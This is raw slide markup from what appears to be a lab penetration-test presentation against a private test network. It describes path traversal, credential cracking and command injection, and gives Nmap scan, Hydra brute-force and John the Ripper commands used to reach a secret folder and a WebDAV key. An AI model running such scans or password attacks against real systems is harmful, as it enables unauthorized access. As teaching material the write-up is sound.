              <a:t>Hostname: ML-RefVm-684427</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8" name="Google Shape;1058;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59" name="Google Shape;1059;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0" name="Google Shape;1060;p57"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="686100"/>
            <a:ext cx="6764624" cy="369940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7" name="Google Shape;1067;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8" name="Google Shape;1068;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4" name="Google Shape;1074;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5" name="Google Shape;1075;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6" name="Google Shape;1076;p59"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="419800" y="1198750"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{9B51E6B2-3F8B-4528-A542-1EF268BE0935}</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ML-REFVM-684427</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Hyper-V Host Server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ELK Server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server1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Web Server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Kali Linux host</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2" name="Google Shape;1082;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4" name="Google Shape;1084;p60"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="467150" y="1201900"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{9B51E6B2-3F8B-4528-A542-1EF268BE0935}</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marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1000">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>CWE-22: Improper Limitation of a</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1000">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Pathname to a Restricted Directory</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <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The software uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory.</a:t>
                      </a:r>
                      <a:endParaRPr i="1"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None/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1000">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>An attacker can gain access to sensitive and system information on the system, delete or modify files. The maximum impact depends on the functionality of the application.</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marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1000">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>OAT-007: Credential Cracking</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr sz="1000">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <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Brute force, dictionary (word list) and guessing attacks used against authentication processes of the application to identify valid account credentials.</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None/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1000">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Credential stuffing and credential cracking are the primary methods hackers use to accomplish account takeover—the unlawful accessing of a user account to commit fraud.</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marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1000">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>CWE-77: Command Injection</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <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The software constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component</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None/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1000">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>If a malicious user injects a character (such as a semi-colon) that delimits the end of one command and the beginning of another, it may be possible to then insert an entirely new and unrelated command that was not intended to be executed.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>CWE-22: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Improper Limitation of a Pathname to a Restricted Directory</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1090" name="Google Shape;1090;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1" name="Google Shape;1091;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1"/>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Tools Used:</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Nmap</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Dirbuster</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Hydra</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1"/>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Host located with Nmap</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Folders discovery with Dirbuster</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Brute-force password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>discovery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> with Hydra</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRP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4" name="Google Shape;1104;p61"/>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1"/>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Nmap</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nmap -sS -A 192.168.1.105</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Dirbuster</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Hydra</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hydra -l &lt;user&gt; -P /usr/share/wordlists/rockyou.txt -s &lt;port&gt; -f -vV 192.168.1.105 http-get </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/company_folders/secret_folder/</a:t>
            </a:r>
            <a:endParaRPr sz="800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1106" name="Google Shape;1106;p61"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6530912" y="2191650"/>
            <a:ext cx="1505625" cy="1067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OAT-007: Credential Cracking</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112" name="Google Shape;1112;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3" name="Google Shape;1113;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Tools Used:</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John the Ripper password cracker</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Hydra</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15" name="Google Shape;1115;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1116" name="Google Shape;1116;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7" name="Google Shape;1117;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62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1119" name="Google Shape;1119;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0" name="Google Shape;1120;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1" name="Google Shape;1121;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With does tools we were able to access the access the secret folder and collect the address and access key for the webdav folder in the server</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1123" name="Google Shape;1123;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1124" name="Google Shape;1124;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5" name="Google Shape;1125;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6" name="Google Shape;1126;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2"/>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Hydra</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hydra -l &lt;user&gt; -P /usr/share/wordlists/rockyou.txt -s &lt;port&gt; -f -vV 192.168.1.105 http-get </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/company_folders/secret_folder/</a:t>
            </a:r>
            <a:endParaRPr i="1"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John the Ripper</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john &lt;your_file&gt;</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="8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